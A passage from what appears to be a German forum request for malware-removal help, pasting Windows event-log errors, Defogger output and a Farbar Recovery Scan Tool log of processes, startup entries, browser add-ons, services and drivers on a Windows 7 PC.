Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:35:43 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:35:37 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:34:29 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:34:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:34:18 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:34:17 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".


System errors:
=============
Error: (03/26/2015 00:50:22 PM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 43. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 00:50:22 PM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 43. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 00:27:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "PDF Architect 2 Creator" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.

Error: (03/26/2015 11:01:12 AM) (Source: Schannel) (EventID: 4120) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung generiert: 40. Der interne Fehlerstatus lautet: 252.


Microsoft Office Sessions:
=========================
Error: (03/26/2015 01:38:05 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:38:04 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:50 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:45 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:43 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:35:37 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:29 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:18 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL

Error: (03/26/2015 01:34:17 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Program Files\IncrediMail\bin\MFC80U.DLL


==================== Memory info =========================== 

Processor: Intel(R) Core(TM)2 Quad CPU Q8200 @ 2.33GHz
Percentage of memory in use: 42%
Total physical RAM: 3327.05 MB
Available physical RAM: 1899.14 MB
Total Pagefile: 6652.4 MB
Available Pagefile: 4605.05 MB
Total Virtual: 2047.88 MB
Available Virtual: 1889.5 MB

==================== Drives ================================

Drive c: (System Windows 7) (Fixed) (Total:447.03 GB) (Free:61.6 GB) NTFS
Drive d: (GS108Ev3) (CDROM) (Total:0.06 GB) (Free:0 GB) CDFS
Drive f: (Neue Platte) (Fixed) (Total:931.51 GB) (Free:168.39 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 447.1 GB) (Disk ID: 0C83BAF4)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=447 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 1853B33D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Code:

ATTFilter

defogger_disable by jpshortstuff (23.02.10.1)
Log created at 13:48 on 26/03/2015 (k)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...

FRST Logfile:

Code:

ATTFilter

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
Ran by k (administrator) on K-PC on 26-03-2015 13:50:53
Running from C:\Users\k\Downloads\trojaner anleitung
Loaded Profiles: k (Available profiles: k)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\sched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\Cyberlink\PowerCinema\Kernel\TV\CLCapSvc.exe
(Hauppauge Computer Works) C:\Program Files\WinTV\TVServer\HauppaugeTVServer.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe
(Hauppauge Computer Works) C:\Program Files\WinTV\TVServer\CaptureGenPCI.exe
(PGP Corporation) C:\Windows\System32\PGPserv.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe
() C:\Program Files\Cyberlink\Shared files\RichVideo.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\System32\UI0Detect.exe
() C:\Program Files\Cyberlink\PowerCinema\Kernel\TV\CLSched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\My Avira\Avira.OE.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Cyberlink\PowerCinema\PCMService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiSeAgnt.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\My Avira\Avira.OE.Systray.exe
(PGP Corporation) C:\Program Files\PGP Corporation\PGP Desktop\PGPtray.exe
(Hauppauge Computer Works, Inc.) C:\Program Files\WinTV\WinTV7\WinTVTray.exe
(IncrediMail, Ltd.) C:\Program Files\IncrediMail\bin\ImApp.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(ICQ, LLC.) C:\Program Files\ICQ7.5\ICQ.exe
(Microsoft Corporation) C:\Windows\System32\MDM.EXE
(The Wireshark developer community, hxxp://www.wireshark.org/) C:\Program Files\Wireshark\Wireshark.exe
(The Wireshark developer community) C:\Program Files\Wireshark\dumpcap.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7514656 2009-05-22] (Realtek Semiconductor)
HKLM\...\Run: [Skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-05-22] (Realtek Semiconductor Corp.)
HKLM\...\Run: [PCMService] => C:\Program Files\CyberLink\PowerCinema\PCMService.exe [151552 2007-08-10] (CyberLink Corp.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [1603152 2007-09-13] (CANON INC.)
HKLM\...\Run: [NvBackend] => C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe [1795872 2014-08-19] (NVIDIA Corporation)
HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [165976 2014-07-20] (Trend Micro Inc.)
HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1078832 2014-07-20] (Trend Micro Inc.)
HKLM\...\Run: [avgnt] => C:\Program Files\Avira\AntiVir Desktop\avgnt.exe [704512 2015-03-17] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [Avira Systray] => C:\Program Files\Avira\My Avira\Avira.OE.Systray.exe [126712 2015-01-19] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\...\Run: [IncrediMail] => C:\Program Files\IncrediMail\bin\IncMail.exe [251336 2009-09-07] (IncrediMail, Ltd.)
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\...\MountPoints2: {5f86d241-81ff-11e4-9728-806e6f6e6963} - D:\.\Setup.exe
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\...\MountPoints2: {df79adaa-8230-11e4-9d85-806e6f6e6963} - D:\autostart.exe
AppInit_DLLs: PGPmapih.dll => PGPmapih.dll File Not Found
Lsa: [Notification Packages] scecli PGPpwflt
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\PGPtray.exe.lnk
ShortcutTarget: PGPtray.exe.lnk -> C:\Windows\Installer\{04A8595A-4B2F-4A20-BA5D-E6B371657FF8}\Icon6560581611.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Symantec Fax Starter Edition-Anschluss.lnk
ShortcutTarget: Symantec Fax Starter Edition-Anschluss.lnk -> C:\Program Files\Microsoft Office\Office\1031\OLFSNT40.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status..lnk
ShortcutTarget: WinTV Recording Status..lnk -> C:\Program Files\WinTV\WinTV7\WinTVTray.exe (Hauppauge Computer Works, Inc.)
Startup: C:\Users\k\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk
ShortcutTarget: Adobe Gamma.lnk -> C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
ShellIconOverlayIdentifiers: [IconOverlayHandlerAccessible] -> {3DBF5F01-3287-46EB-82CF-45AA5C241162} => C:\Windows\system32\PGPfsshl.dll (PGP Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.de/
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/de-de/?ocid=iehp
HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Software\Microsoft\Internet Explorer\Main,ICQ Search = hxxp://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> DefaultScope {B72A4286-AFD7-410F-8349-A7EC3ABCA6A2} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> {6552C7DD-90A4-4387-B795-F8F96747DE19} URL = hxxp://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd
SearchScopes: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001 -> {B72A4286-AFD7-410F-8349-A7EC3ABCA6A2} URL = https://www.google.com/search?q={searchTerms}
BHO: PDF Architect Helper -> {691B33B0-B86E-47F3-81C7-56E4FE3B929C} -> C:\Program Files\PDF Architect 2\creator-ie-helper.dll [2014-10-10] (pdfforge GmbH)
BHO: TmIEPlugInBHO Class -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll [2014-06-30] (Trend Micro Inc.)
BHO: TmBpIeBHO Class -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll [2014-07-11] (Trend Micro Inc.)
Toolbar: HKLM - PDF Architect Toolbar - {DEEB13D7-CEA9-45FB-B77C-E039BEC85221} - C:\Program Files\PDF Architect 2\creator-ie-plugin.dll [2014-10-10] (pdfforge GmbH)
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} https://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll [2014-07-11] (Trend Micro Inc.)
Handler: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll [2014-06-30] (Trend Micro Inc.)
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll [2014-07-20] (Trend Micro Inc.)
Filter: application/octet-stream - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - mscoree.dll No File []
Filter: application/x-complus - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - mscoree.dll No File []
Filter: application/x-msdownload - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - mscoree.dll No File []
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Winsock: Catalog9 01 C:\Windows\system32\PGPlsp.dll [68728] (PGP Corporation)
Winsock: Catalog9 20 C:\Windows\system32\PGPlsp.dll [68728] (PGP Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

FireFox:
========
FF ProfilePath: C:\Users\k\AppData\Roaming\Mozilla\Firefox\Profiles\c9upjmzt.default
FF SelectedSearchEngine: ICQ Search
FF Homepage: https://www.google.de/?gws_rd=ssl
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-05] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2014-05-22] (DivX, LLC.)
FF Plugin: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files\DivX\DivX Web Player\npdivx32.dll [2014-11-21] (DivX, LLC)
FF Plugin: @nvidia.com/3DVision -> C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin: @nvidia.com/3DVisionStreaming -> C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [pdf_architect_2_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 2\resources\pdfarchitect2firefoxextension
FF Extension: PDF Architect 2 Creator - C:\Program Files\PDF Architect 2\resources\pdfarchitect2firefoxextension [2014-12-12]
FF HKLM\...\Firefox\Extensions: [tmbepff@trendmicro.com] - C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\firefoxextension
FF Extension: Trend Micro BEP Firefox Extension - C:\Program Files\Trend Micro\AMSP\module\20002\9.0.1069\9.0.1069\firefoxextension [2015-03-26]
FF HKLM\...\Firefox\Extensions: [{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}] - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension
FF Extension: Trend Micro Osprey Firefox Extension - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension [2015-03-26]

Chrome: 
=======
CHR Profile: C:\Users\k\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-12]
CHR Extension: (Google Drive) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-12]
CHR Extension: (YouTube) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-12]
CHR Extension: (Google Search) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-12]
CHR Extension: (Google Wallet) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-12]
CHR Extension: (Gmail) - C:\Users\k\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-12]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2014-12-12] (Adobe Systems) [File not signed]
R2 AntiVirSchedulerService; C:\Program Files\Avira\AntiVir Desktop\sched.exe [432888 2015-03-17] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files\Avira\AntiVir Desktop\avguard.exe [432888 2015-03-17] (Avira Operations GmbH & Co. KG)
R2 Avira.OE.ServiceHost; C:\Program Files\Avira\My Avira\Avira.OE.ServiceHost.exe [182520 2015-01-19] (Avira Operations GmbH & Co. KG)
R2 CLCapSvc; C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapSvc.exe [290913 2007-08-10] () [File not signed]
R2 CLSched; C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLSched.exe [118879 2007-08-10] () [File not signed]
R2 HauppaugeTVServer; C:\Program Files\WinTV\TVServer\HauppaugeTVServer.exe [563712 2011-07-22] (Hauppauge Computer Works) [File not signed]
R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2015-03-17] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
S2 PDF Architect 2 Creator; C:\Program Files\PDF Architect 2\creator-ws.exe [738856 2014-10-10] (pdfforge GmbH)
R2 PGPserv; C:\Windows\system32\PGPserv.exe [135288 2010-04-01] (PGP Corporation)
R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [963632 2014-07-20] (Trend Micro Inc.)
R2 RichVideo; C:\Program Files\Cyberlink\Shared files\RichVideo.exe [262247 2007-08-10] () [File not signed]
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
R2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 -ad -bt=0 [X]
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [105864 2015-03-17] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [136216 2015-03-17] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [37352 2015-03-17] (Avira Operations GmbH & Co. KG)
S1 CXAVSAUD; C:\Windows\System32\DRIVERS\pvavsaud.sys [11008 2005-10-25] (Conexant Systems, Inc.)
R3 hcw88bda; C:\Windows\System32\drivers\hcw88bda.sys [182400 2008-04-18] (Hauppauge Computer Works, Inc)
R3 hcw88rc5; C:\Windows\System32\Drivers\hcw88rc5.sys [12288 2008-04-18] (Hauppauge Computer Works, Inc.)
R3 HCW88TSE; C:\Windows\System32\drivers\hcw88tse.sys [320256 2008-04-18] (Hauppauge Computer Works, Inc)
R3 hcw88vid; C:\Windows\System32\drivers\hcw88vid.sys [394880 2008-04-18] (Hauppauge Computer Works, Inc)
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x86.sys [48640 2009-08-23] (Atheros Communications, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [119512 2015-03-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2015-03-17] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [5810 2004-08-13] ()
R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R1 ssmdrv; C:\Windows\System32\DRIVERS\ssmdrv.sys [28520 2015-03-17] (Avira GmbH)
R1 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [108072 2014-07-14] (Trend Micro Inc.)
R0 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [302760 2014-07-14] (Trend Micro Inc.)
R0 TMEBC; C:\Windows\System32\DRIVERS\TMEBC32.sys [40736 2013-07-01] (Trend Micro Inc.)
R3 tmeevw; C:\Windows\System32\DRIVERS\tmeevw.sys [90936 2014-05-29] (Trend Micro Inc.)
R1 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [89032 2014-07-14] (Trend Micro Inc.)
